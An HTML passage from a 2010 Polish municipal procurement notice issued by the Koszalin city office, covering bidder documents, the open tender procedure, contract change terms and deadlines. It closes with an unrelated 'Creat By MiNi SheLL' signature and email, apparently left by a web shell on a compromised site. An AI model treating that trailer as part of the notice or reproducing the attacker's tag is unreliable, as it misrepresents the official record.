<p>należy dołączyć do oferty dokument lub dokumenty, z których wynika uprawnienie do podpisania oferty i dokumentów złożonych wraz z ofertą np.: aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, statut spółki itp.
W przypadku, gdy Wykonawcę reprezentuje pełnomocnik, Pełnomocnictwo do reprezentowania Wykonawcy określające jego zakres winno być również złożone wraz z ofertą  (o ile nie wynika to z innych dokumentów załączonych do oferty,                o których mowa wyżej) i podpisane przez osoby uprawnione do reprezentowania wykonawcy. Pełnomocnictwo należy złożyć w oryginale w przypadku kserokopii  pełnomocnictwo musi być poświadczone notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. 	ZAMAWIAJĄCY dopuszcza możliwość dokonania następujących zmian postanowień zawartej umowy w stosunku do treści oferty WYKONAWCY:
1) konieczność dostosowania terminu realizacji zamówienia w przypadku zaistnienia poniższych okoliczności: 
a) na skutek działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których Strony nie były 
w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w terminie, w tym wystąpienia niekorzystnych warunków atmosferycznych, uniemożliwiających prowadzenie robót;
b) wstrzymania robót przez ZAMAWIAJĄCEGO lub przerw w wykonywaniu robót powstałych na skutek okoliczności, za które ponosi odpowiedzialność ZAMAWIAJĄCY; 
c) wystąpienia konieczności wykonania zamówienia dodatkowego w rozumieniu 
art. 67 ust.1 pkt 5, którego realizacja będzie miała wpływ na termin wykonania przedmiotu umowy;
d) ujawnienia się w trakcie wykonywania przedmiotu zamówienia wad w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót uniemożliwiających wykonanie przedmiotu umowy w terminie;
2) zmiany w przypadkach losowych, osób wskazanych przez WYKONAWCĘ w wykazie będącym załącznikiem do oferty, przewidzianych do wykonywania samodzielnych funkcji technicznych przy realizacji robót budowlanych, przy czym kwalifikacje oraz doświadczenie tych osób będą takie same lub wyższe jak osób podanych w wykazie. 
2. Podstawą dokonania zmian, o których mowa w ust. 1 pkt 1 będzie protokół konieczności określający wystąpienie okoliczności uzasadniających wprowadzenie zmiany terminu.
3. W przypadku wniosku WYKONAWCY o dokonanie zmiany, o której mowa w ust. 1 pkt 2, WYKONAWCA obowiązany jest przedstawić dokumenty potwierdzające kwalifikacje wskazywanych osób pozwalające na stwierdzenie spełniania przez wskazane osoby wymagań SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.koszalin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Koszalinie
Biuro Zamówień Publicznych
ul. Mickiewicza 26
75-004 Koszalin
pokój nr 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2010 godzina 09:00, miejsce: Urząd Miejski w Koszalinie
Biuro Zamówień Publicznych
ul. Mickiewicza 26
75-004 Koszalin
pokój nr 15.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com